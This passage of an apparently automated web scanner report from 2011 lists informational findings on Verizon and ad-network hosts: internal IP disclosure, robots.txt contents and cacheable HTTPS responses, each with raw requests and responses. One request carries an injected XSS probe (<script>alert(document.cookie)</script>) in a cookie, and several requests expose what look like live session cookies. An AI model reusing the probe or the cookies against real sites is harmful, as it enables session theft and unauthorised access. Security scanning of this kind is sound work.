Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html lang="">


<!-- *** WEB SITE INFORMATION AND COPYRIGHT ********************************************
...[SNIP]...

20.8. http://www.facebook.com/connect/prompt_feed.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/prompt_feed.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/prompt_feed.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.22.50
Connection: close
Date: Mon, 05 Sep 2011 22:36:09 GMT
Content-Length: 12409

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/connect\/prompt_feed.php";window._EagleEyeSeed="a2xk";</s
...[SNIP]...

20.9. http://www.facebook.com/dialog/feed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /dialog/feed

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /dialog/feed HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: locale=en_US; expires=Mon, 12-Sep-2011 22:36:10 GMT; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdialog%2Ffeed; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.149.54
Connection: close
Date: Mon, 05 Sep 2011 22:36:10 GMT
Content-Length: 14722

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/dialog\/feed";window._EagleEyeSeed="EcbK";</script><meta
...[SNIP]...

20.10. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www22.verizon.com/jobs/&send=false&layout=box_count&width=50&show_faces=true&action=like&colorscheme=light&font&height=65 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.24.42
X-Cnection: close
Date: Mon, 05 Sep 2011 22:18:54 GMT
Content-Length: 23220

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

20.11. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.157.61
Connection: close
Date: Mon, 05 Sep 2011 22:36:10 GMT
Content-Length: 26542

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

20.12. http://www.facebook.com/profile.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /profile.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /profile.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fprofile.php; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.151.33
Connection: close
Date: Mon, 05 Sep 2011 22:36:10 GMT
Content-Length: 0


20.13. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.147.31
Connection: close
Date: Mon, 05 Sep 2011 22:36:09 GMT
Content-Length: 0


20.14. http://www.google.com/sdch/StnTz5pY.dct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/StnTz5pY.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sdch/StnTz5pY.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL
If-Modified-Since: Sat, 03 Sep 2011 05:07:34 GMT

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: application/x-sdch-dictionary
Last-Modified: Sat, 03 Sep 2011 05:07:34 GMT
Date: Mon, 05 Sep 2011 22:21:41 GMT
Expires: Mon, 05 Sep 2011 22:21:41 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 124609

Domain: .google.com
Path: /search

<!doctype html> <head> <title> - Google Search</title> <script>window.google={kEI:" NMWJ_5AK_rfB8gw",kEXPI:"28505,288 30316,31303,31405",kCSI
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: YKq3QHbl0RwJ:www.autotrader.com/+used+cary4a-lQGHU2cJ:www.vehix.com/+used+car &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com onmousedown="return clk(this.hre
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:rZQjSq2ux10J:translate.reference.com/+Hzpd6vNFcrsJ:translate.google.com/+ &hl=en&ct=clnk&gl=us&source=www.google.com','','','',' 9&hl=en&ct=clnk&gl=us&source=www.google.com','','',
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;cd=3 onmousedown="return clk(this.href,'','','',' ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','',' >
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:H75rMPosXksJ:www.cars.com/+used+carOJ7l3PBi2ywJ:www.usedcars.com/+used+car1nPyaj3yx18J:www.orbitz.com/App/DisplayCarSearch+ &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=ww
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: rnetlion.com/article/Direct-TV-vs-Dish-Network KvzX53GQf98J:www.directv.com/DTVAPP/content/My_Account OHG47yeqhSoJ:www.directv.com/DTVAPP/content/contact_us
...[SNIP]...

20.15. http://www.whitefence.com/static/Seymour.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /static/Seymour.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /static/Seymour.js HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.connecttoverizon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:19:07 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:19:07 GMT
Last-Modified: Thu, 30 Sep 2010 22:20:37 GMT
ETag: "2b8556-49fd-4ca50d35"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 18941

/*
   Package: Seymour
       Revision $Id: Seymour.js 10919 2010-01-29 16:25:17Z evan $

       Native javascript client-side frontend for Skinner webservice. It uses no specific frameworks,
       and should be com
...[SNIP]...
seconds) allowed for a callback response, defaults to 5 seconds
       timeOut: 5000,
       // skinner web service to which all requests are sent, defaults to the load-balanced production instance.
       //url: '//10.0.0.139/cgi-bin/skinner.dll', // build-test skinner (on Tennessee)
       url: '//www.whitefence.com/scripts/server/skinner.php', // external skinner
//url: '//www.whitefence.com/cgi-bin/skinner.dl
...[SNIP]...

21. Credit card numbers disclosed

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /vzTracker/vzTracker.aspx

Issue detail

The following credit card number was disclosed in the response:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /vzTracker/vzTracker.aspx?appName=ECSP_OLH&type=1&requestUrl=http%3A//www22.verizon.com/residentialhelp/phone&referrer=http%3A//www22.verizon.com/residentialhelp/fiostv&Title=Verizon%20%7C%20Local%20%26%20Long%20Distance%20Phone&Lang=en-US&scrRes=1920X1200&scrdepth=16&id=4049907096195.966 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www22.verizon.com/residentialhelp/phone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; 
UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html
Expires: Mon, 05 Sep 2011 22:40:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:40:08 GMT
Content-Length: 959
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>vzTracker</title>
       <meta content="Microsoft Visual Studio 7.0" name="GENERATOR">
       <meta content="C#" na
...[SNIP]...
entialhelp%2fphone&amp;referrer=http%3a%2f%2fwww22.verizon.com%2fresidentialhelp%2ffiostv&amp;Title=Verizon+%7c+Local+%26+Long+Distance+Phone&amp;Lang=en-US&amp;scrRes=1920X1200&amp;scrdepth=16&amp;id=4049907096195.966" id="Form1">
...[SNIP]...

22. Robots.txt file
There are 14 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


22.1. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Mon, 05 Sep 2011 22:14:39 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 05 Sep 2011 22:14:39 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

22.2. http://cache.vzw.com/stylesheets/fonts.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.vzw.com
Path:   /stylesheets/fonts.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cache.vzw.com

Response

HTTP/1.0 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Fri, 10 Sep 2010 21:19:21 GMT
Content-Length: 558
ETag: "22e-4c8aa0d9"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:14:30 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /scripts
Disallow: /Scripts
Disallow: /perl
Disallow: /images_b2c
Disallow: /b2b_images
Disallow: /images
Disallow: /img
Disallow: /*.gif$
Disallow: /*.jpg$

...[SNIP]...

22.3. http://ehg-verizon.hitbox.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HG

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ehg-verizon.hitbox.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:13:51 GMT
Server: Hitbox Gateway 9.3.6-rc1
Connection: close
Cache-Control: max-age=3600, private, proxy-revalidate
Expires: Mon, 05 Sep 2011 23:13:51 GMT
Content-Type: text/plain
Content-Length: 36

User-agent: *
Disallow: /Diagnostic

22.4. http://g-pixel.invitemedia.com/gmatcher

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /gmatcher

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 05 Sep 2011 22:14:42 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.5. http://pixel.mathtag.com/event/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f48 32584
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

22.6. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 06 Sep 2011 22:14:38 GMT
Content-Type: text/plain
Content-Length: 26
Date: Mon, 05 Sep 2011 22:14:38 GMT
Server: QS

User-agent: *
Disallow: /

22.7. http://r.turn.com/server/beacon_call.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/beacon_call.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Mon, 05 Sep 2011 22:14:38 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

22.8. http://s.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /meta

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 05 Sep 2011 22:14:31 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/plain
Last-modified: Fri, 31 Jul 2009 18:32:10 GMT
Content-length: 26
Etag: "1a-4a7338aa"
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /

22.9. http://segment-pixel.invitemedia.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 05 Sep 2011 22:14:39 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.10. http://verizon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://verizon.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: verizon.com

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 05 Sep 2011 22:27:39 GMT
Content-length: 50
Content-type: text/plain
Last-modified: Mon, 26 Feb 2001 17:05:42 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /eweb/
Disallow: /dayone/

22.11. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

Summary

Severity:   Information
Confidence:   Certain
Host:   http://verizonwireless.tt.omtrdc.net
Path:   /m2/verizonwireless/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: verizonwireless.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: text/plain
Date: Mon, 05 Sep 2011 22:14:33 GMT
Accept-Ranges: bytes
ETag: W/"25-1309299047000"
Connection: close
Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT
Content-Length: 25

User-agent: *
Disallow: /

22.12. http://www.googleadservices.com/pagead/conversion/1032222048/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1032222048/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Mon, 05 Sep 2011 22:14:42 GMT
Expires: Mon, 05 Sep 2011 22:14:42 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.13. http://www.verizonwireless.com/b2c/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.verizonwireless.com

Response

HTTP/1.1 200 OK
Server: None
Date: Mon, 05 Sep 2011 22:14:31 GMT
Content-type: text/plain
Last-modified: Tue, 16 Oct 2007 03:07:10 GMT
Content-length: 558
Etag: "22e-47142ade"
Accept-ranges: bytes
Connection: keep-alive

User-agent: *
Disallow: /cgi-bin
Disallow: /scripts
Disallow: /Scripts
Disallow: /perl
Disallow: /images_b2c
Disallow: /b2b_images
Disallow: /images
Disallow: /img
Disallow: /*.gif$
Disallow: /*.jpg$

...[SNIP]...

22.14. http://www22.verizon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www22.verizon.com

Response

HTTP/1.0 200 OK
Content-Length: 173
Content-Type: text/plain
Content-Location: http://www22.verizon.com/robots.txt
Last-Modified: Thu, 10 Apr 2008 03:18:56 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Mon, 05 Sep 2011 22:13:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:13:38 GMT
Connection: close

User-agent:    *
Allow:        /
Disallow:    /dslmembersonly
Disallow:    /ForYourHome/voip/
Disallow:    /ForYourHome/VOIP/
Disallow:    /ForYourHome/Voip/
Disallow:    /ForYourhome/voip/

23. Cacheable HTTPS response
There are 36 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


23.1. https://12.xg4ken.com/media/redir.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://12.xg4ken.com
Path:   /media/redir.php

Request

GET /media/redir.php HTTP/1.1
Host: 12.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:34:38 GMT
